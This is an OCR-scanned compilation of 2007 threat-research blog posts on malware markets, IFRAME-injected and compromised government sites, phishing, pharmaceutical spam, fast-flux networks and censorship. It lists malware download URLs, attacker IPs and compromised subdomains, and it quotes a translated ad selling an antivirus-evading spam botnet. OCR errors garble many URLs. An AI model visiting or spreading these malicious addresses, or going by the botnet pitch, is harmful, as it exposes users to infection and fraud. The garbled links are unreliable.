malware tool compared to using the publicly available and 

therefore with a high detection rate ones. The seller's one-to- 
many market proposition may generate sales on a 

volume basis, but the more people have the malware tool in 
question, the more commoditized, thus ineffective and 

much easier to fall into the hands of an anti virus vendor or a 
researcher it gets. And so, proprietary malware tools 

started emerging, ones only a small amount of people have 
access to. Nowadays, the malware industry is slowly 

maturing to a services-oriented economy as the logical 
evolution from a products-centered one, further accelerating 





its dynamics and future growth. What follows once goods and 
services both mature as a concept? Outsourcing, 

which as a matter of fact is already happening. 

The Invisible Hand of the Malware Coder 
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The concept of proprietary malware tools is a very interesting 
one mainly because the coders of the malware tools 

are exercising control over the supply and distribution of the 
malicious goods in order to earn a higher return on 

investment, and ensure the customer gets the best product 
ever, one that must remain undetected for as long as 

possible. In respect to the distribution, it's sort of a self¬ 
regulation issue mainly because the buyer that spent a 

significant amount of money to obtain the latest malware 
tool will not leak it online and turn it into a commodity. As for 
the seller, he's ensuring that the tool will be sold to, for 
instance, five different people, no more and no less, since the 
perceived value and coder-added exclusiveness will result in 
a very high profit margin. 

[2]The market gets even more dynamic with the possibility 
for the buyer to exchange the malware tool he obtained 

at the over-the-counter market, and by doing so to limit the 
tool's exclusiveness, risk to have its value come close 

to zero if it leaks online, and most interestingly, his actions 
would have a butterfly effect on the other four people that 


hypothetically paid a higher profit margin price to obtain it 
Given that the seller is interested in a higher profit margin 
only, he could either increase it and sell it to less than five 
people thinking that the less people have it the lower the 
chance it will leak or get exchanged, or if customer 
satisfaction and long-term relationships matter come 

up with a strategy on how to ensure the tools remain 
exclusive, though educating his customers for instance. 

Images of crypters and joiners are samples of currently 
available proprietary malware tools for sale. 

1. http://seclists.or g /fulldisclosure/2007/Au a /0411.html 

2. http://ddanchev.blo as pot.com/2007/Q3/under a round- 
economvs-su ppl v-of- a oods.html 
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CISRT Serving Malware (2007-10-03 14:20) 

The [ljChinese Internet Security Response Team is reporting 
that it has found embedded IFRAMEs serving malware 

within some of its pages. And despite that the blog itself is 
now clean, [2]Trend Micro are pointing out that the main 
index is still IFRAME-ed and that the attackers took 
advantage of the momentum during [3]China's "Golden 
Week" 

holiday. 

IFRAMEs at the main index lead to : 

js. users. 51. Ia/392481.js 












51.la/?392481 

img. users. 51. la/392481. asp 

IFRAMEs at the blog used to point to : 

mms.nmmmn.com/99913.htm 

mms.nmmmn.com/30000.htm 

mms.nmmmn.com/11122.htm 

and ganbibi.com - where the twenty password stealers for 
online games located at ads.ganbibi.com/100.exe 

to ads.ganbibi.com/120.exe in numerical order are still 
active. 

Related posts: 
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[4] Bank of India Serving Malware 

[5] U.S Consulate St. Petersburg Serving Malware 

[6] Syrian Embassy in London Serving Malware 

1. http://www.cisrt.or a /enblo a /read. ph p7172 

2. http://blo a .trendmicro.com/cisrt-under-attack-2a aas ps2a/ 

3. http://www.canada.com/topics/news/world/storv.html? 
id = 99936605-ef45-4f62-9f73-44b466697bd3&k=80756 

4. http://ddanchev.blo as pot.com/2007/Q8/bank-of-india- 
servin a -malware.html 

















5. http://ddanchev.blo as pot.com/2007/Q9/us-consulate-st- 
oetersbur a -servin a .html 


6. http://ddanchev.blo as pot.com/2007/Q9/svrian-embassv-in- 
london-servin a .html 
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DIY CAPTCHA Breaking Service (2007-10-03 17:53) 

Given that spammers and phishers are already [l]breaking, 
bypassing our outsourcing their CAPTCHA breaking needs, 

the introduction of a DIY ([2]do-it-yourself) model provided 
confidence in the recognition process is over 80 %, was 

inevitable. The CAPTCHA Bot is a good example of a recently 
released DIY CAPTCHA breaking service where the users 

feed their accounts with credits, sets URLs and CAPTCHA's to 
get recognized. If it were pitched at vendors or anyone 

out there maintaining a CAPTCHA as a service it would have 
been a great idea, trouble is, it would be largely abused in its 
current form. Let's discuss the incentives model. Are 
developers of CAPTCHAs interested in improving the security 

of their CAPTCHAs in the form of contests with financial 
rewards or job propositions for those who dare to break 

them in a contest form? Not necessarily, and fixing 
vulnerabilities whenever such appear is done in an "on 
demand" 

fashion like we've seen with Vladuz's Ebay CAPTCHA 
populator. CAPTCHAs at the most popular web services are 













the 


gatekeepers of their online reputation, else, the flood of 
[3]splogs and malware embedded blogs, as well as spam and 

phishing emails coming from free web based email providers 
may outpace the current model. 

1. http://ddanchev.blo as pot.com/2007/Q9/spammers-and- 
phishers-breakin a -captchas.html 

2. http://ddanchev.blo as pot.com/2007/Q3/vladuzs-eba v- 
ca ptcha- po pulator.html 

3. http://ddanchev.blo as pot.com/20Q6/ll/blo aos phere-and- 
s plo a s.html 
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People's Information Warfare Concept (2007-10-05 
11:27) 

Malicious Culture of Participation 

DoS battle stations operational in the name of the 11 
[lJPlease, input your cause ". Preventing a malware infection 
in order to limit the possibility for the host to become part of 
a botnet that will later one [2]start a large scale 

[3]DDoS attack is such a rational thinking that [4]information 
warriors truly understanding what [5]information war¬ 
fare is all about, tend to undermine. The recently discussed 11 
[6]people's information warfare" concept highlighting 
China's growing interest in the idea, is a great example of a 
culture of participation orbiting around hacktivism cause, a 
















culture we've also seen in many other hacktivism tensions in 
the past, and will continue to see in the future. The entire 
concept is relying on the fact that the collective bandwidth of 
people voluntarily "donating" it, is far more efficient from a 
"malicious economies of scale" perspective, compared to for 
instance the botnet masters having to create the botnet by 
infecting users in one way or another. Moreover, empowering 
an average Internet user with [7]diversified DoS capabilities 
is directly increasing the nation's asymmetric warfare 
capabilities in an event of a hacktivism war. 

Furthermore, the majority of DoS or DDoS flooding tools have 
a relatively high detection rate, but when peo¬ 
ple 
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want to use them, they'll simply turn off their anti virus 
software, the one they use to prevent malware infections, 

but in a "people's information warfare" they can go as far as 
consciously becoming a part of a hacktivism centered botnet. 
Take this DoS tool featured in the screenshot for instance, it 
has a high detection rate only if the anti virus software is 
running, but in situation where a "malicious culture of 
participation" is the desired outcome it doesn't really matter. 
Donating their bandwidth and pretending to be malware 
infected is far more dangerous than botnet 

masters acquiring DDoS capability by figuring out how to 
infect the massess. It's one thing to operate a botnet 

and direct it to attack a certain site, and entirely another to 
be infected with a malware that's DDoS-ing the site, a 


situation where you become an "awakened and fully 
conscious zombie host". 
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Examples of the "People's Information Warfare 
Concept" : 

- [8]During the China/U.S hacktivism tensions in 2001 over 
the death of a Chinese pilot crashing into an AWACS, 

[9]Chinese hacktivists released mail bombers with pre¬ 
defined U.S government and military emails to be attacked, 

thus taking advantage of the people's information warfare 
concept 

- The release of the Muhammad cartoons had its old-school 
hacktivism effect, namely [10]mass defacements 

of Danish sites courtesy of Muslim hacktivists to achieve a 
decent [ll]PSYOPS effect online and in real-life 

- [12]The Israel vs Palestine Cyberwars is a great example of 
how [13]DIY web site defacement tools were re¬ 
leased from both sites which resulted in a web vulnerabilities 
audit of the entire web space they were interested in 

defacing to spread hacktivism propaganda 

- [14]Cyber jihadists taking advantage of the "people's 
information warfare" concept by syndicating a list of sites to 
be attacked from a central location, and promoting the use of 
a Arabic themed DoS tool against "infidel" 


supporting sites 


- [15]What exactly happened during Russia's and Estonia's 
hacktivism tensions? The [16]voting poll that is still 

available indicates that people believe it was botnet masters 
with radical nationalism modes of thinking. But judging 

from the publicly obtainable stats, ICMP often comes in the 
form of primitive DIY DoS tools compared to [ 17]the 

more advanced attacks for instance. Collectivist societies do 
not need coordination because they know everyone 
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else will do it one way or another. 

Power to the people. 

UPDATE: 

[18]Turkish hackers target Swedish Web sites -" Hackers in 
Turkey have attacked more than 5,000 Swedish Web sites in 
the past week, and at least some of the sabotage appears 
linked to Muslim anger over a Swedish newspaper drawing 

that depicted the Prophet Muhammad's head on a dog's 
body. Around 1,600 Web sites hosted by server-provider 

Proinet and 3,800 sites hosted by another company have 
been targeted, Proinet spokesman Kjetil Jensen said Sunday. 

Jensen said hackers, operating on a Turkish network, at times 
replaced files on the sites with messages. 11 


1. 

http://www.alexandrasamuel.com/dissertation/pdfs/Samuel- 

Hacktivism-entire.pdf 

2. http://ddanchev.blo as pot.com/2007/09/storm-worms-ddos- 
attitude-part-two.html 

3. http://ddanchev.blQ as pQt.com/2007/09/stQrm-WQrms-ddos- 
attitude.html 

4. http://www.iwar.or a .uk/cip/resQurces/uk/sld014.htm 

5. http://www.iwar.or a .uk/cip/resQurces/uk/DQQdv-Hod a es. ppt 

6. http://ddanchev.blo as pQt.com/2007/09/chinas-cvber- 
es piona a e-ambitions.html 

7. http://ddanchev.blo as pot.com/2007/Q9/custom-ddos- 
ca pabi l lities-within-malware.html 
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ps vcholo a ical.html 

12 . 
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13. http://ddanchev.blo as pot.com/2006/Q7/hacktivism- 
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14. http://ddanchev.blo as pot.com/2007/Q8/cvber i ihadist- 
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15. http://ddanchev.blo as pot.com/2007/Q8/vour-point-of- 
view-requested.html 

16. http://www.imedialearn.com/imediapoll/poll. php? 
code=f!156c39d3c972139c62bc91cl7e2c53 


17. http://ddanchev.blo as pot.com/2007/Q5/ddos-on-demand- 
vs-ddos-extortion.html 
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http://www.boston.com/news/world/europe/articles/2007/10/ 
08/turkish hackers tar g et Swedish web sites/ 
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Assessing a Rock Phish Campaign (2007-10-08 15:12) 

The majority of [l]Rock Phish campaigns usually [2]take 
advantage of [3]a single domain that's hosting numerous 

different phishing scams targeting different financial 
organizations. However, another trend is slowly emerging 
and 

that is the development of phishing domain farms, either 
taking advantage of a shared hosting as you can see in the 

graph on the left, or fast-fluxing the campaigns to 
[4]increase the average time a phishing site remains online. 
Here's the interesting part acting as proof on the 



























[5]emerging trend of so called [6]malicious economies of 
scale, and also, 

showcasing Rock Phish's effiency vs security trade off due to 
the centralization of the campaign on a single IP only. In this 
campaign we see a single IP ([7]200.77.213.15) hosting 
[8]38 rock phish domains, that on the other hand in a 

typical Rock Phish style host multiple phishing pages 
targeting different companies. 

Meanwhile, there's still a lot of confusion going on about 
what exactly Rock Phish is, and as you can see in this article, 
it's [9]wrongly implied that it's some sort of a phisher's group 


11 Nobody knows exactly who or what Rock Phish are - 
whether it's one person or a group of people - but security 
researchers believe Rock Phish is behind as many as half of 
all phishing attacks on the Web. Fast flux is a method by 524 
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which a domain name that phishers use has multiple IP 
addresses assigned to it. The phishers switch those domains 

quickly between the addresses so that it's not as easy to find 
or shut down the phishing sites. " 

[10]and another one : 

11 Of particular concern is an increase in ''rock phishing ," 
originated by the Rock Phish Gang based in Eastern Europe. 

Rock phishers use stolen information to register and rapidly 
cycle through domain names and IP addresses. They 


obscure their origin with botnets, which automate unwitting 
consumers' computers to send out spam. " 

In reality, [ll]Rock Phish is a script taking advantage of the 
now commoditized phishing pages of each and every 

web property and company that is a potential victim, hosted 
on a single domain in order to achieve efficiency. Once 

the script and the phishing pages are in the wild, the entry 
barriers into phishing scams become significantly lower 

allowing novice phishers to easily launch what used to a 
professional phishing campaign much easier than ever. 

[12]Why give the kid a phish, when you can teach them to 
phish? 

1. http://ddanchev.blo as pot.com/2QQ7/Q9/2Q9-host- 
locked.html 

2. http://ddanchev.blo as pot.com/2007/07/confirm-vour- 
a ullibiliitv.html 
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phishin a -domains.html 

4. http://ddanchev.blo as pot.com/20Q7/Q7/avera a e-online- 
time-for-phishin a -sites.html 

5. http://ddanchev.blo as pot.com/2007/Q9/di v- phishin a -kit- 
a oes-20.html 

6. http://ddanchev.blo as pot.com/2007/Q8/di v- phishin a- 
kits.html 






























7. http://www.mooload.com/new/file. php? 

fiIe=fileO 1/081007/1191850172/rock ohish domains.txt&s= 
t 

8 . 

htt o://195.210.38.41:2082/file01/081007/1191850172/rock 

ohish domains.txt 

9. http://www.infoworld.com/article/07/10/Q4/Rock-Phish- 
usin a -fast-f1ux-ohishin a -attacks_l.html 

10. http://www.redherrin a .com/Home/22604 

11. http://www.dslreports.com/forum/rl8762644-Rock-phish- 
information-continued~start=60 


12. http://securitvmike.blo as pot.com/20Q7/10/teachin a -how- 
to-phish.html 

526 


£ 


£ 


Incentives Model for Pharmaceutical Scams (2007-10- 
10 13:17) 

Sometimes, it's unbelievable how easy is in fact to social 
engineer people on their way to "make a deal" online, 
especially when buying pharmaceuticals online. Let's discuss 
organized pharmaceutical scams the way I perceive 

them, which like phishing also aim at reaching the efficiency 
level. 

It's a public secret that Amazon.corn's success in terms of 
sustained profitability has to do with their affiliation 























based model, namely "let the others do the sale for you". 
Pharmaceutical scammers have been anticipating this model 
for quite some now, a model where the pharma masters 
forward the processes of [l]collecting potential 

customers ([2]emails harvesting), contacting them and 
letting them know of how cheap their pharmaceutical are 

([3]spamming), enticing them to initiate a transaction with a 
fancy and professionally looking like site (freely available 
pharmacuitical web site templates) to those who become 
part of an affiliate network like the one you can see in the 

screenshot. 
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Pharmaceutical scammers have their own fast-flux networks 
of constantly changing domain and IP addresses, shared 
hosting of multiple scams in different segmets. Remember 
[4]meds247.org? It's still up and running but the javascript 

obfuscation I reviewed before is now pointing to web server's 
directory whose main index hosts a pOrn site - cen- 

ter4cares.com , so you have a pOrn site that's hosting viagra 
propositions - "insightful". Moreover, pharmacuitical scam 
campaigns are also known to use free web space providers as 
doorway pages [5]in the form of redirectors. For 

instance, the most recent spamming campaign promoting a 
Canadian Pharmacy scam located at rxlovecaptain.com, 

is taking advantage of the already established trusted brand 
of Geocities to redirect the spammers users to the main 


page : 



geocities.com/MorganLogan82 

geocities.com/AishaDeleon78 

geocities.com/CarsonNguyen93 

If efficiency truly matters from a scammer's perspective, we 
may soon witness actual DIY marketing packages with 

templates, "collection of potential customers", and a list of 
services to use when "contacting them". Now, if the pharma 
masters want to diversify as well, they can [6]vertically 
integrate by owning or renting the spamming services 

themselves, something I haven't come across to - yet. 

1. http://ddanchev.blo as pot.com/2007/01/inside-email- 
harvesters-confi a uration.html 

2. http://ddanchev.blo as pot.com/2006/09/ennail-spann- 
harvestin a -stafistics.html 

3. http://ddanchev.blo as pot.com/2007/05/msn-spammin a- 
bot.html 

4. http://ddanchev.blo as pot.com/20Q7/10/love-is- 
ps vchedelic-too.html 

5. http://www.websense.com/securitvlabs/blo a /blo a.php? 
Blo a lD=149 

6. http://en.wikipedia.or a /wiki/Vertical inte g ration 
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Compromised Sites Serving Malware and Spam (2007- 
10-10 15:28) 

Wish it was the average .cn domain I'm referring to, in this 
case it's the web sites of three U.S towns, namely the 

City of Chetek, Winsonsin, the City of Somerset, Texas 
and Town of Norwood, Massachusetts, who are [l]the 
latest victims of [2]embedded malware and [3]blackhat SEO 
injected within their juicy from a blackhat SEO perspective 

.gov tld extensions. 

Apparently, malicious parties managed to compromise City of 
Chetek's official site and created several subdomains 

with URLs consisting of spam redirecting to the downloader's 
page : 

st-3.x.cityofchetek-wi.gov/porn/st3/502.html 
st-3.x.cityofchetek-wi.gov/porn/st3/537.html 
st-2 .x.cityofchetek-wi .gov/porn/st2/322 .html 
2 k.x.cityofchetek-wi.gov/porn/2k-003/1618.html 
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st-2 .x.cityofchetek-wi.gov/porn/st2/409. html 

The following URLs redirect to the downloader: 
freeclipoftheday.com/moviel.php?id=4154 &n=teens &bor- 

der=FFFFFF &bgcolor=000000 

Detection rate : Result: 9/32 (28.13 %) 


File size : 75771 bytes 

MD5 : a74b09c7e6ca828ec0382c4f4f234bac 

SHA1 : 2861a4215dd2a579afele30372e05d2ea00223f2 

City of Somerset, Texas official site is also embedded with the 
same blackhat SEO content structure, which leads me 

to the conclusion that these two are related : 

2 k.x.somersettx.gov/porn/2k-004/156.html 

2 k.x.somersettx.gov/porn/2k-004/313.html 

2 k.x.somersettx.gov/porn/2k-004/829.html 

2 k.x.somersettx.gov/porn/2 k-004/830.html 

st-5.x.somersettx.gov/porn/st5/103.html 
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Town of Norwood, Massachusetts : 
sql.norwood- 

ma. gov/I i braries/transformations/.dir/132/val ium-cost.html 

I dap. norwood-ma.gov/htdocs/js/.dir/12/valium-on I ine- 
order.html 

Several more high profile sites hosting such scams I came 
across to yesterday are NASA's Worldwind, and the 

State of New Jersey that used to historically host such pages : 


issues.worldwind.arc.nasa.gov/secure/attachment/10781/Buy 

-Valium.html 

issu es. world wind.arc. nasa.gov/secu re/attach ment/10800/Vali 
um.html 

issues.worldwind.arc.nasa.gov/secure/attachment/10791/Pan 
asonic-Ringtone.ht ml 

nj.gov/education/voc/9/2007/ 

nj.gov/education/voc/9/2007/vi agra/vi agra-online.html 

nj.gov/education/voc/9/2007/zoloft/buy-zoloft-on I ine.html 

nj.gov/education/voc/9/2007/tramadol/discount- 

tramadol.html 

Moreover, during the last week, another pack of sites were 
also reported to serve malware, spam, and blackhat SEO 

pages on their servers : 

[4] Collateral Damage: CA County Site Redirects to Porn, 
Countermeasure Causes Major Hassle 

[5] Arizona Government University Site: Hacked! 
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[6] Calipornication... Again 

[7] Bank of Ghana, others, compromised 

[8] Brookhaven National Labs hacked, serving porn 

Just yesterday for instance, F-Secure discovered [9]a 
phishing page hosted at India's Police Academy site, and 



Sunbelt pointed out that Beer.ch [10]got IFRAME-ed with 
the following URLs belonging to the Russian Business 
Network who also IFRAME-ed Bank of India once : 

81.95.149.74/1/index.php 

81.95.149.74/22/index.php 

How is all this happening? In both, automated, and 
sometimes targeted way, where [ll]automated stands for 
remote 

file inclusion through botnets. 

I sure know all the pharmaceutical blockbusters now. 
Related posts: 

[12] Bank of India Serving Malware 

[13] U.S Consulate in St.Petersburg Serving Malware 

[14] Syrian Embassy in London Serving Malware 

[15] CISRT Serving Malware 

[16] Attack of the SEO Bots on the .EDU Domain 

[17] Malicious Keywords Advertising 

1. http://ddanchev.blo as pot.com/2007/Q7/malware- 
embedded-sites-increasin a .html 

2. http://ddanchev.blo as pot.com/2007/09/ po pular-web- 
malware-exploitation.html 

3. http://ddanchev.blo as pot.com/2007/Q9/examples-of- 
search-en a ine-spam.html 

















4. http://blo a .trendmicro.com/collateral-dama a e3a-ca- 
countv-site-redirects-to-porn2c-countermeasure-causes-m 

ai or-hassle/ 

5. http://blo a .trendmicro.com/arizona- a overnment- 
universitv-site3a-hacked21/ 

6. http://blo a .trendmicro.com/calipornication-a a ain/ 

7. http://sunbeltblo a .blo as pot.com/20Q7/10/bank-of- a hana- 
others-compromised.html 

8. http://sunbeltblo a .blo as pot.com/20Q7/10/brookhaven- 
national-labs-hacked-servin a .html 

9. http://www.f-secure.com/weblo a /archives/00001289.html 

10. http://sunbeltblo a .blo as pot.com/2007/10/nothin a -is- 
scared-beer-site-hacked.html 


11. http://ddanchev.blo as pot.com/2007/Q7/sal-in i ection- 
throu a h-search-en a ines.html 

12. http://ddanchev.blo as pot.com/2007/Q8/bank-of-india- 
servin a -malware.html 

13. http://ddanchev.blo as pot.com/2007/Q9/us-consulate-st- 
petersbur a -servin g .html 

14. http://ddanchev.blo as pot.com/2007/09/s vri an-embass v- 
in-london-servin a .html 

15. http://ddanchev.blo as pot.com/20Q7/10/cisrt-servin a- 
malware.html 


16. http://ddanchev.blo as pot.com/20Q7/01/attack-of-seo- 
bots-on-edu-domain.html 






























































17. http://ddanchev.blo as pot.com/2007/Q4/malicious- 
ke vwords-advertisin a .html 
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Fast-Flux Spam and Scams Increasing (2007-10-11 
17:34) 

As I pointed out in my last series of posts assessing 
pharmaceutical scams and phishing campaigns, both, 
[l]botnet 

masters, [2]pharma masters, and [3]rock phishers, are 
starting to take advantage of fast-flux networks to make it 

harder to trace back and shut down their operations. Here's 
[4]a related article on the topic : 

11 With fast-flux, spammers continually change the URL in the 
e-mail to counter filtering efforts. The constant change 
requires a corresponding defense that recognizes those 
changes as they occur, Red Condor officials said. Fast-flux 
botnets turn IP addresses against anti-spammers. Using a 
large number of servers, fast-flux DNS uses a compromised 
PC as a proxy, frustrating investigators. In its September 
intelligence report, MessageLabs counted fast-flux DNS 

techniques as one of the key reasons botnets are hard to 
shut down. The My Space worm that compromised thousands 

of My Space users' sites earlier this year utilized fast-flux 
techniques. 11 






Let's showcase this emerging trend. Take for instance some 
recently spammed .cn domains such as considerjust.cn 

and pageagainst.cn advertising a Canadian Pharmacy 
scam. The domains have an allocated space of IPs to rotate 
on each and every request to them, something you can easily 
verify by pinging them and see how their IPs change on 

every new ping in coordination with the allocated IP table 
you can see in the screenshot. It gets even more 
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interesting, especially in terms of locating the main fast-flux 
domain, in this case it's mainseven.com, a central point for 
[5]a great deal of other [6]pharma domains in its fast-flux. 
Here are graphs of fast-flux spam and scam networks : 

[7] mainseven.com 
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[8]aaapills.org 
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[9]comproper.com 
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[ 10 ] lovelypills.com 
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[ll]fonteay.com 
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[12]drugslovetown.com 
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[13]abcmeds.org 

As in every other competitive industry, pretty much all the 
market participants such as botnet masters, pharma mas¬ 
ters, spammers and scammers, follow what the others are 
doing and by taking notice in which practices the others 

outperform them, figure out how to apply them within their 
practices at a later stage - competitive benchmarking 

within the underground ecosystem is already a fact. 

1. http://ddanchev.blo as DOt.com/2007/Q9/storm-worms-fast- 
f1ux-networks.html 

2. http://ddanchev.blo as pot.com/20Q7/10/love-is- 
ps vchedelic-too.html 

3. http://ddanchev.blo as pot.com/2007/10/assessin a -rock- 
phish-campai a n.html 


4. http://www.eweek.eom/article2/0 . 1759 . 2191940 . 00.as p 

















5. http://www.mooload.com/new/file. php? 

fiIe=fileO 1/111007/1192118547/oharma domains fastflux.tx 

t&s=t 


6 . 

htt p://195.210.38.41:2082/file01/111007/1192118547/ohar 
ma domains_fastf1ux.txt 

7. 

http://im a 222.ima a eshack.us/im a 222/8486/oharmafastfluxa i 

^fDng 
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8 . 

http://im a l66.ima a eshack.us/im a l66/2060/pharmafastf1ux0 

2cp6. ona 

9. 

http://im a l66.ima a eshack.us/im a l66/9861/pharmafastf1ux0 

3 oz5. pna 

10 . 

http://im a 214.ima a eshack.us/im a 214/5568/pharmafastf1ux0 

4ze2. pna 

11 . 

http://im a 73.ima a eshack.us/im a 73/9979/pharmafastf1ux05 iv 

Lung 

12 . 

http://im a 214.ima a eshack.us/im a 214/7759/pharmafastf1ux0 

6ca9. pna 

13. 

http://im a 73.ima a eshack.us/im a 73/3541/pharmafastf1ux07cr 

O.Rng 
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Does This Blog Speak for Itself? (2007-10-11 20:33) 

Before January 2007, I could only say that I'm glad to have 
you as a reader of this blog, but with the [ 1 ]Talkr-ization of 
my blog during that month, I can now freely say I'm also glad 
to have you as both, a reader and a listener taking into 
consideration the interest in the [2Jaudio versions of my 
analyses. It's great to follow the progress of the service and 
the efforts the folks behind it put into improving its quality. I 
can only hope that they reach [3]Ms. Dewey's speech 

engine, even go beyond it by allowing customization in the 
form of different voices to choose from. 

Moreover, all the readers who are interested in [4]reading 
this blog on a mobile device, can do so via a newly started 
service called [5]MoFuse that I'm using as of recently : 
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11 MoFuse is short for Mobile Fusion. MoFuse was founded in 
July of 2007 and released it's first private beta in late 
September of 2007. MoFuse allows content publishers to 
create RSS driven mobile sites and gives our users the ability 
to control almost every aspect of the design using some of 
our AJAX features. 11 

Enjoy! 

1. http://ddanchev.blo as pot.com/2007/02/talkrization-of-m v- 
blo a .html 






2. http://talkr.com/a p p/cast pods.a p p?feed _Sd = 31762 


3. http://ddanchev.blo as pot.com/20Q6/10/ms-clewev-on- 
microsoft-and-securitv.html 

4. htto://m.mofuse.com/danchev 

5. http://mofuse.com/ 

543 




A Journey to the Heart of Internet Censorship (2007- 
10-11 23:54) 

Reporters Without Borders [ 1 ]just released their latest report 
on [2]China's Internet Censorship practices, outlining 

how exactly bureaucracy intersects with technology, perhaps 
the worst combination I could think of : 

11 The report also documents how the Beijing Internet 
Information Administrative Bureau has in practice asserted 
its daily editorial control over the leading news websites 
based in the nation's Capital, it gives many examples of the 
actual instructions issued by officials in charge of this 
bureau. The last part of the report gives the results of a 
series of tests conducted with the mechanism of control 
through filtering keywords. These tests clearly show that, 
though there are still many disparities in the levels of 
censorship, the authorities have successfully coerced the 
online media into submission to censor themselves heavily 
on sensitive subjects. " 

[3]lnformation is not free, but it just wants to be free and you 
cannot control the rules of curiosity and the 













basic right to know who's what and what's when - [4]even if 
you shut down the Internet access inside the country. 

China's Internet censorship is on the other hand a driving 
force for academic research across the globe. Even 

wondered what are the latest blocked keywords discovered 
filtered over time? Try the [5]list of blacklisted keywords 

discovered by ConceptDoppler, as of 19 Sep 2007, part of the 

[6] ConceptDoppler project - A Weather Tracker for 

Internet Censorship. 

Related posts: 

[7] Twisted Reality 

[8] China - the biggest black spot on the Internet's map 

[9] Chinese Internet Censorship efforts and the outbreak 

[10] Securing Political Investments Through Censorship 
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[lljWorld's Internet Censorship Map 

[12] China's Interest of Censoring Mobile Communications 

[13] South Korea's View on China's Media Control and 
Censorship 

[14] China's Internet Censorship Report 2006 

[15] Media Censorship in China - FAQ 

[16] Google and Yahoo's Shareholders Against Censorship 



[17] It's all About the Vision and the Courage to Execute it 

[18] Gender Based Censorship in the News Media 

[19] Real Time Censored URL Check in China 

[20] Censoring Flickrin China 

1. http://www.rsf.or a /article. ph p3?id_article=23924 

2 . 

http://www.rsf.or a /IMG/pdf/Vo vaa e au coeur de la censure 
GB.pdf 

3. http://en.wikipedia.or g /wiki/lnformation wants to be free 

4. 

http://www.eurekalert.or a /ima a es/release_ ara phics/pdf/burm 

areport_24sept2007_press.pdf 

5. http://www.cs.unm.edu/~crandall/cd/badwords.html 

6 . 

http://www.cs.unm.edu/~crandall/concept do p pler_ccs07.pdf 

7. http://ddanchev.blo as pot.com/20Q6/01/twisted- 
realitv.html 

8. http://ddanchev.blo as pot.com/2006/01/china-bi aa est- 
black-spot-on-internets.html 

9. http://ddanchev.blo as pot.com/2006/Q2/chinese-internet- 
censorship-efforts.html 

10. http://ddanchev.blo as pot.com/2006/Q4/securin a- 
politicalHnvestments-throu a h.html 











































11. http://ddanchev.blo as pot.com/2006/Q6/worlds-internet- 
censorshio-mao.html 


12. http://ddanchev.blo as pot.com/2006/Q7/chinas-interest- 
of-censorin a -mobile.html 

13. http://ddanchev.blo as pot.com/2006/Q7/south-koreas- 
view-on-chinas-media.html 


14. http://ddanchev.blo as pot.com/2006/Q8/chinas-internet- 
censorship-reoort-2006.html 

15. http://ddanchev.blo as pot.com/2006/09/media- 
censorshio-in-china-faa.html 

16. http://ddanchev.blo as pot.com/2006/12/ a oo a le-and- 
vahQos-shareholders-a a ainst.html 

17. http://ddanchev.blo as pot.com/20Q7/01/its-all-about- 
vision-and-coura a e-to.html 

18. http://ddanchev.blo as pot.com/2007/Q2/ a ender-based- 
censorshio-in-news-media.html 

19. http://ddanchev.blo as pot.com/2007/Q3/real-time- 
censored-url-check-in-china.html 


20. http://ddanchev.blo as pot.com/2007/Q6/censorin a -11ickr- 
in-china.html 
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Managed Spamming Appliances - The Future of Spam 
(2007-10-13 16:08) 













































What's the future of spam? [l]Spammers breaking CAPTCHAs 
of legitimate email providers and take advantage 

of their clean IP reputation to send out their junk, or 
spammers cooperating with botnet masters supplying newly 

infected hosts? [2]Try outsourcing as a concept [3]by renting 
a "managed spamming appliance" like the ones 

advertised as of recently. 

This is an automatically translated excerpt from a recent 
proposition for a newly developed spam system that 

comes in the form of hardware with embedded botnet, just 
consider the idea for a second before reading and you'll 

get the point: 

Among spammers very agreement that spam has become a 
profitable and die their last months, years. And it 

is understandable: profit fell, suppliers downloads expensive 
prices almost to the size of profits, a dozen well-known and 
had a good year or two ago turnover spammers departed 
from the market, so even monsters flow of spam once 

died theme ran in the stream than definitive did the topic 
boring. 

I am pleased to present to you the technology that will make 
your distribution more efficient and voskresit 

characteristic of the spam profits. 

Our software allows you spamit in such quantities that letter 
competitors simply lost among your. Also you 



get tools to control the delivery of letters and inboks spam 
those domains that are not being held by any other spam. 

We have reached the maximum speed possible with the 
distribution of each bot and defended it against pos¬ 
sible anti-virus and firewalls. In doing so, your botnety 
invincible. Interesting? And now in more detail. 

Overall software works like any other botmeyler. 

Botnet controlled part of a server, it created letters and 

mailing bases loaded. Botha knocking over the job to a 
server, get a piece base, and a letter vdohnovlenno spamyat 

until the turn will come next door for the job. 

Each server keeps 2500 + online bots, and the maximum 
speed reaches 7000 mailing letters per second, is 

the highest speed of all current market spam systems. Of 
course, the speed depends largely on the quantity and 

quality of downloads, quality and type of database (country, 
large domains, etc). 2500 online for you too little? No 

problem. Berit 2, 5, 10 servers, as long as you want. 

In our system, there is every possible means to randomise 
from any randomise texts finishing randomnyh gen¬ 
erate images on the fly or finished morphing images, as well 
as the ability to create their own makro-skripty. 

You can independently create and edit headers (if there is 
time to do so, fresh headlines you will download our 



spam-inzhenery). 

You can do so zarandomlennye letter, as far themselves want. 
After randomization letter, you can immedi¬ 
ately check finished look and see the results of the 
verification Spam Assasin ohm. 

For specific newsletters (probiv major domains, etc), there is 
a possibility in detail settings bots (different 

types of reactions to the texts of error codes and mail 
servers). You can customize the system to thin to work with 
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certain domains to improve the quality and speed of spam to 
these domains, identifying the individual parameters for 
each domain (how many letters it takes for a session 
timeouts, own blacklist bots, enter special codes for SMTP 

session forgiven domain, etc.) 

To avoid zamorachivatsya processing bases on a separate 
server, all options included in the processing soft¬ 
ware. Among them: removal from the database of addresses 
abuzerov, splitting bases on the large and normal 

domains merger bases subtraction bases and checking for 
uniqueness. 

24 hours a day, 7 days a week, you can use the services 
tehpodderzhki and complex issues of sending spam 

to discuss with our engineers. In addition, you can order the 
service "personal manager" who will help draw up a letter to 



monitor the continuous distribution, will help choose the 
supplier of downloads and decide on the overall 

strategy for working with partnerkami. The main advantages 


1 . 

The speed and delivery. 

Average up-to medium-speed downloads of 1.5 letters per 
second from one 

spamyaschego bots, 2 to bots spamyat at speeds of 3000 
letters per second, equal to 10 leading to millions of 

messages delivered per hour. This average figures for good 
loading each bot could spamit up to 3.5 letters per 

second. 

2. The persistence of bots. Botha bypass all the latest 
version of anti-virus and faervollov, including the latest 
version of Zone Alarm, Outpost, Kaspersky, and the bot 
rigidly set in the system so that they are impossible to 

remove, even in safe mode. All innovation and refinement, 
we test drivers bots not only stands the test on different 

versions of the OS, but also on actual downloads from various 
suppliers. Cleaning loadera happens every day. 

3. Convenience work, and further opportunities for constant 
refinement. We make the process convenient 


